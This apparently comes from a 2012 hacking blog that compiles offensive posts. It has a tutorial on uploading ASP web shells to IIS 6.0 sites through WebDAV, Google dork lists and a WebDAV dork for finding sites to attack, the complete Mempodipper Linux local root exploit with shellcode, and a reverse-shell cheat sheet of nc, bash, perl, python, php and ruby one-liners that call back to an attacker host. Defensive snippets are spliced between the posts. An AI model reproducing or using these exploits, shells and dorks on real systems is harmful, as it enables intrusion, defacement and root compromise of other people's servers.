BLACK BURN HACKER


Tuesday, January 31, 2012

[TuT] Exploiting Microsoft/IIS 6.0 WebDAV - Uploading Files

Today I will be teaching a way to exploit a very common vulnerability and upload your shell and/or deface page to a Microsoft IIS 6.0 based website.

What you will need:
A Windows machine.
Basic knowledge of shells.
A Microsoft/IIS 6.0 website with WebDAV enabled.
An ASP shell. - http://www.[removed].com/?d=YU209ET7 << Download link for the shell. (Do not even try a PHP shell, it won't work. You can use your ASP shell to upload your PHP shell after though.)


This is how to perform the exploit in Windows 7:
Click start > Computer.
You will see this page: http://img851.imageshack.us/i/iis1.png/

Next you will want to click "Map network drive", it has been circled in the picture above.
Now a window will pop-up, it should look like this: http://img638.imageshack.us/i/iis2.png/

Again, I have circled what needs to be clicked. Click on it, and a window will come up asking you to click "Next"; do so. After you have clicked the "Next" button, you should see this: http://img850.imageshack.us/i/iis3.png/

You will need to highlight/click the folder I circled, then hit the "Next" button once again. It should redirect you to this page: http://img21.imageshack.us/i/iis4.png/

I put "www.vulnerablesite.com" as an example. You have to type in "http://vulnerablesite.com", otherwise it will not work: the address must start with http://, not www. You will receive an error unless you use http:// (once again, http://vulnerablesite.com).
Hit the "Next" button again, and it should come up with the site name "vulnerablesite.com". You can name it whatever you like; this is what I put: http://img130.imageshack.us/i/iis5.png/

Except I changed it to "IIS 6.0 Exploit for HF - Phizo".
It doesn't matter what you put, just make sure you remember it.
Make sure the box is ticked (open when finished) then go ahead and hit finish.
Okay, we've exploited the website. Now we want to upload our files to the website. A new window has just opened; as you can see, we're connected to the website's files, however we're not allowed to view the files as we're unauthorized. No matter, we can still upload our shells and whatever other files we would like to upload.
Okay, I don't think I will need to put any pictures in this one, it's that simple. Follow my instructions:
#1 - Open the directory where your ASP shell is (example: desktop, documents, or a custom folder). Your ASP shell should have a name similar to "shell.asp;anything.jpg".
#2 - Drag your ASP shell from your custom folder into the website folder we just exploited. It should just go straight in there with no problems.
Tada! We have successfully uploaded our shell! Now all we have to do is go to: http://vulnerablesite.com/shell.asp;anything.jpg.

I hope this helps.
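A way to spot this activity in IIS 6.0 logs, as an added example that is not part of the original post: it parses W3C-format log lines (the sample below is constructed, not taken from any real server), flags WebDAV write methods, and flags the "name.asp;anything.jpg" file names the post relies on, since IIS 6 runs such a file as ASP regardless of the .jpg suffix.

```python
import re

# Constructed IIS 6.0 W3C log excerpt (not from the post): a normal GET, the
# Windows WebDAV client probing, a PUT of "shell.asp;anything.jpg" and a
# request that then runs it.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2012-01-31 10:00:01 10.0.0.5 GET /index.htm - 80 - 192.0.2.10 Mozilla/4.0 200 0 0
2012-01-31 10:00:02 10.0.0.5 PROPFIND / - 80 - 192.0.2.44 Microsoft-WebDAV-MiniRedir/6.1.7601 207 0 0
2012-01-31 10:00:03 10.0.0.5 PUT /shell.asp;anything.jpg - 80 - 192.0.2.44 Microsoft-WebDAV-MiniRedir/6.1.7601 201 0 0
2012-01-31 10:00:04 10.0.0.5 GET /shell.asp;anything.jpg cmd=dir 80 - 192.0.2.44 Mozilla/4.0 200 0 0
"""
# WebDAV methods that create, modify or remove server content.
DAV_WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# IIS 6 hands "name.asp;x.jpg" to the ASP engine: a script extension followed
# by ";" in the path is the upload-and-execute trick used in the post.
SEMICOLON_SCRIPT_RE = re.compile(r"\.(asp|aspx|asa|cer|cdx);", re.IGNORECASE)

def parse_w3c(lines):
    """Yield one dict per request, taking column names from the #Fields: line."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line or fields is None:
            continue
        else:
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated lines
                yield dict(zip(fields, values))

def find_webdav_abuse(lines):
    """Return the requests worth reviewing, each tagged with why it matched."""
    hits = []
    for rec in parse_w3c(lines):
        method = rec.get("cs-method", "").upper()
        uri = rec.get("cs-uri-stem", "")
        reasons = []
        if method in DAV_WRITE_METHODS:
            reasons.append("dav-write")
        if SEMICOLON_SCRIPT_RE.search(uri):
            reasons.append("semicolon-script-name")
        if reasons:
            hits.append({"time": rec.get("date", "") + " " + rec.get("time", ""),
                         "client": rec.get("c-ip", "-"), "method": method,
                         "uri": uri, "status": rec.get("sc-status", "-"),
                         "reasons": reasons})
    return hits
```

A 201 on a PUT to a WebDAV root that was not supposed to accept anonymous writes is the confirmation; the later GET of the same name shows the uploaded file being executed.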
©2011, copyright BLACK BURN

Dorks, using dorks, finding dorks

[small tut]Dorks, using dorks, finding dorks.
For educational purposes only!

Useful sites.
You could also look for exclusive dorks and original exploits on:
http://www.exploit-db.com/
http://1337day.com/
http://hackingexpose.blogspot.com/
http://sekurity.tumblr.com/

Dork lists on: SQLI, XSS, LFI, RFI, RTE.

Random, very useful dorks!
http://pastebin.com/sX85tSEY <- worth gold!

SQLI SQL Injection
http://pastebin.com/dzQRHqhu
http://pastebin.com/0FqmasC7 <-from kobez.
http://pastebin.com/x1rtqktj <-from kobez.
http://pastebin.com/APxqavu9 <-from kobez.

XSS Cross Site Scripting
http://pastebin.com/85JiHniy

LFI Local File Inclusion
http://pastebin.com/FBpYuZRh 

RFI Remote File Inclusion
http://pastebin.com/zevqd3fR 

RTE Remote File Upload
http://pastebin.com/b05LyBm9

LFD Local File Disclosure.
http://pastebin.com/HBLrBL0B

[tut] Creating google dorks

Hello, Real steel here with another tutorial!

In this tutorial I will explain how to create your own dorks,
advanced dorks!

Do you really think inurl: is the only Google dork you can use?
Wrong, there are many you can use!


intitle:
inurl:
intext:
define:
site:
phonebook:
maps:
book:
froogle:
info:
movie:
weather:
related:
link:


These also help you find other things than vulnerable sites.
Happy googling!

Anyway, I was going to show how to use some of them for finding vulnerable sites.

intitle:
intitle:rte/file_uploud (this is an example to find RTE vulnerable sites.)

You can use intitle: to find anything in the title of the website,
which can also be useful for finding downloads or anything else.

inurl:
inurl:index.php?id= (we already know this one)

inurl: basically looks for anything after the colon in the site's URLs. (obvious)

intext:
intext:"powered by mybb" (This one is awesome!)

You can find literally everything with this one.
You could even combine it with the inurl: dorks.

Anyway, with this we can find certain messages on a site that we can use.
My example looks for all MyBB forums.

Which means that if I ever find a vulnerability in a MyBB forum
and know how to locate it,
then I can find every MyBB forum with this dork.

define:
define:"sql syntax error" (Google defines your message)

Google will define this message and will look for what had this error, for the example I gave.

site:
Obvious, Google looks for a site.
site:cocacola (Google will look for any site related to cocacola.)

phonebook:
Do I really need to explain this?
Give it a name and Google will look for the phone number related to it.

maps:
Google will look on Google Maps for your search.

book:
book:java language (this will look for any book Google has indexed with "java language" in it.)
Google has an online library.
If you want to find interesting books, use this dork.

froogle:
Uses Froogle search instead of Google.

info:
info:firefox (Google uses many info sites.)
This is useful.
Google looks for anything you input, but only information about it.
In the example I gave, firefox,
Google will get you a lot of things explaining what Firefox is.

movie:
If you use this,
you can find a lot about movies on Google.

movie:watch hackers2 online

Together with some of your own context Google will serve you any movie.
(A movie, not just a site with advertisements: grr)
Any movie file is useful for this dork.
Have fun watching!

weather:
weather: 21/12/2011 london

Obvious, isn't it?

related:
related:egg (Google responds with sites about chickens laying eggs.)
This will look for anything related to what you input.

link:
link:index.php?id= (this is very useful, I would say even more than inurl:.)
People always show the inurl: method?
This one works better: instead of only looking in the search URL, it will also look in the site for URLs
that are possibly vulnerable.

Happy googling, hacking!

Linux Local Root for >= 2.6.39, 32-bit and 64-bit

# Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
# Date: Jan 21, 2012
# Author: zx2c4
# Tested on: Gentoo, Ubuntu
# Platform: Linux
# Category: Local
# CVE-2012-0056


Code:
/*
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/
#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
char *socket_path = "/tmp/.sockpuppet";
int send_fd(int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    int n;
    int sock;
    char cms[CMSG_SPACE(sizeof(int))];
    if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;
    buf[0] = 0;
    iov.iov_base = buf;
    iov.iov_len = 1;
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = CMSG_LEN(sizeof(int));
    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
    if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
        return -1;
    close(sock);
    return 0;
}
int recv_fd()
{
    int listener;
    int sock;
    int n;
    int fd;
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    char cms[CMSG_SPACE(sizeof(int))];
    if ((listener = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    unlink(socket_path);
    if (bind(listener, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;
    if (listen(listener, 1) < 0)
        return -1;
    if ((sock = accept(listener, NULL, NULL)) < 0)
        return -1;
    iov.iov_base = buf;
    iov.iov_len = 1;
    memset(&msg, 0, sizeof msg);
    msg.msg_name = 0;
    msg.msg_namelen = 0;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = sizeof cms;
    if ((n = recvmsg(sock, &msg, 0)) < 0)
        return -1;
    if (n == 0)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
    close(sock);
    close(listener);
    return fd;
}
int main(int argc, char **argv)
{
    if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
        char parent_mem[256];
        sprintf(parent_mem, "/proc/%s/mem", argv[2]);
        printf("[+] Opening parent mem %s in child.\n", parent_mem);
        int fd = open(parent_mem, O_RDWR);
        if (fd < 0) {
            perror("[-] open");
            return 1;
        }
        printf("[+] Sending fd %d to parent.\n", fd);
        send_fd(fd);
        return 0;
    }
    printf("===============================\n");
    printf("=          Mempodipper        =\n");
    printf("=           by zx2c4          =\n");
    printf("=         Jan 21, 2012        =\n");
    printf("===============================\n\n");
    int parent_pid = getpid();
    if (fork()) {
        printf("[+] Waiting for transferred fd in parent.\n");
        int fd = recv_fd();
        printf("[+] Received fd at %d.\n", fd);
        if (fd < 0) {
            perror("[-] recv_fd");
            return -1;
        }
        printf("[+] Assigning fd %d to stderr.\n", fd);
        dup2(2, 6);
        dup2(fd, 2);
        unsigned long address;
        if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
            address = strtoul(argv[2], NULL, 16);
        else {
            printf("[+] Reading su for exit@plt.\n");
            // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
            FILE *command = popen("objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
            char result[32];
            result[0] = 0;
            fgets(result, 32, command);
            pclose(command);
            address = strtoul(result, NULL, 16);
            if (address == ULONG_MAX || !address) {
                printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
                printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
                return 1;
            }
            printf("[+] Resolved exit@plt to 0x%lx.\n", address);
        }
        printf("[+] Calculating su padding.\n");
        FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
        char result[256];
        result[0] = 0;
        fgets(result, 256, command);
        pclose(command);
        unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
        unsigned long offset = address - su_padding;
        printf("[+] Seeking to offset 0x%lx.\n", offset);
        lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
        // See shellcode-32.s in this package for the source.
        char shellcode[] =
            "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
            "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
            "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
            "\x80";
#elif defined(__x86_64__)
        // See shellcode-64.s in this package for the source.
        char shellcode[] =
            "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
            "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
            "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
            "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
            "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
        printf("[+] Executing su with shellcode.\n");
        execl("/bin/su", "su", shellcode, NULL);
    } else {
        char pid[32];
        sprintf(pid, "%d", parent_pid);
        printf("[+] Executing child from child fork.\n");
        execl("/proc/self/exe", argv[0], "-c", pid, NULL);
    }
}


Webdav vulnerability google dork. +3,000 sites infected

Google dork:

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"

or 

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:edu

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY

Just add /webdav to the URL if you find a "WebDAV testpage".

So go ahead, it's hackable through the WebDAV vulnerability :)

Example:


Enjoy.
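What the dork actually matches and how an administrator closes it, as an added example that is not configuration from the post: the weak block gives the "Index of /webdav" listing (the intitle:"index.of" part), the "(Win32) DAV/2" server signature in its footer, and WebDAV writes with no credentials; the corrected block removes all three. Paths and the password file name are placeholders.

```apache
# Weak: the shape the dork above finds. Listing enabled, WebDAV on with no
# credentials for any method, and the default Server header and page footer
# advertising "Apache/2.2.x (Win32) DAV/2". (Constructed example.)
<Directory "C:/www/webdav">
    Dav On
    Options +Indexes
</Directory>

# Corrected: no listing for Google to index, no DAV module named in the
# Server header or in page footers, and a credential required for every
# method that can change content. Serve it over TLS as well, because Basic
# auth sends the password in the clear.
ServerTokens Prod
ServerSignature Off
DavLockDB "C:/www/var/DavLock"
<Directory "C:/www/webdav">
    Dav On
    Options -Indexes
    AuthType Basic
    AuthName "WebDAV"
    AuthUserFile "C:/www/conf/dav.passwd"
    <LimitExcept GET HEAD OPTIONS>
        Require valid-user
    </LimitExcept>
</Directory>
```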

Having trouble back-connecting? Here ya go!

Getting quite a few PMs about back-connection recently. Here's my cheatsheet on doing it manually using what the server gives you. This is more or less a backup if a) your webshells aren't working, and b) you don't know why you can't back-connect. Hopefully you won't get stuck again.

After doing recon on your target, assess what you have access to and simply cherry-pick from below. Or just try them all, why the hell not.

1. netcat with GAPING_SECURITY_HOLE enabled:

Code:
TARGET:nc 192.168.1.133 8080 -e /bin/bash
ATTACKER:nc -n -vv -l -p 8080

2. netcat with GAPING_SECURITY_HOLE disabled:

Code:
TARGET:mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER:nc -n -vv -l -p 8080

3. /dev/tcp socket hack

Code:
TARGET:/bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1
ATTACKER:nc -n -vv -l -p 8080

4. No nc or /dev/tcp available?
Code:
TARGET:mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER:nc -n -vv -l -p 8080

5. Backup - no good reason to use this ahead of the others

Code:
TARGET:telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
ATTACKER:nc -n -vv -l -p 8080
ATTACKER2:nc -n -vv -l -p 8888

6. Straight bash

Code:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7. Inline Perl
Code:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

8. Python
Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

9. PHP inline

Code:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

10. Ruby

Code:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

11. xterm (if available)

Code:
xterm -display 10.0.0.1:1



PHP findsock shell - designed to bypass egress filtering (fucking firewalls =]) - http://pentestmonkey.net/tools/web-shells/php-findsock-shell

Weevely - avoids bind shell/reverse shell, console over HTTP - http://www.garage4hackers.com/f11/weevely-stealth-tiny-php-backdoor-1002.html

WeBaCoo - stealth^2 - http://packetstormsecurity.org/files/108009/webacoo-0.2.zip

But what if I still can't back-connect or nothing happens? - track down the server and take a fucking sledgehammer to it -_-!
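Two host-side checks, added here and not from the original posts, that cover both the Mempodipper post above and this back-connect cheatsheet: one lists processes holding an fd on /proc/<pid>/mem (the exploit's child opens its parent's mem and the exploited su ends up with that file as stderr), the other lists shells whose stdin, stdout and stderr are all sockets, which is the shape the one-liners above leave behind. The proc_root parameter is an assumption for testing against a constructed tree; on a live system the functions read /proc directly and only see what the caller is permitted to inspect.

```python
import os
import re
MEM_RE = re.compile(r"^/proc/(\d+)/mem$")  # fd symlink target for an open mem file
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "perl", "python", "php", "ruby"}

def _pids(proc_root):
    return sorted(int(e) for e in os.listdir(proc_root) if e.isdigit())

def _fd_targets(proc_root, pid):
    """Map fd number -> readlink() target for one process ({} if unreadable)."""
    fd_dir = os.path.join(proc_root, str(pid), "fd")
    targets = {}
    try:
        for name in os.listdir(fd_dir):
            if name.isdigit():
                targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
    except OSError:  # process exited, or not ours to inspect without root
        pass
    return targets

def _comm(proc_root, pid):
    try:
        with open(os.path.join(proc_root, str(pid), "comm")) as f:
            return f.read().strip()
    except OSError:
        return ""

def find_mem_fds(proc_root="/proc"):
    """(pid, comm, fd, n) for every fd open on some /proc/<n>/mem. Mempodipper's
    child opens its parent's mem and the exploited su inherits it as fd 2;
    outside debuggers such fds are rare, so each hit deserves a look."""
    hits = []
    for pid in _pids(proc_root):
        for fd, target in _fd_targets(proc_root, pid).items():
            m = MEM_RE.match(target)
            if m:
                hits.append((pid, _comm(proc_root, pid), fd, int(m.group(1))))
    return sorted(hits)

def find_shells_on_sockets(proc_root="/proc"):
    """(pid, comm) for shells whose fds 0, 1 and 2 are all sockets, the shape
    nc -e, /dev/tcp, perl, python, php and ruby above produce (FIFO variants show pipes)."""
    hits = []
    for pid in _pids(proc_root):
        comm = _comm(proc_root, pid)
        if comm in SHELLS:
            fds = _fd_targets(proc_root, pid)
            if all(fds.get(n, "").startswith("socket:[") for n in (0, 1, 2)):
                hits.append((pid, comm))
    return hits
```

Run both as root to see every process; a non-root run silently skips fd tables it cannot read, so an empty result from an unprivileged account proves nothing.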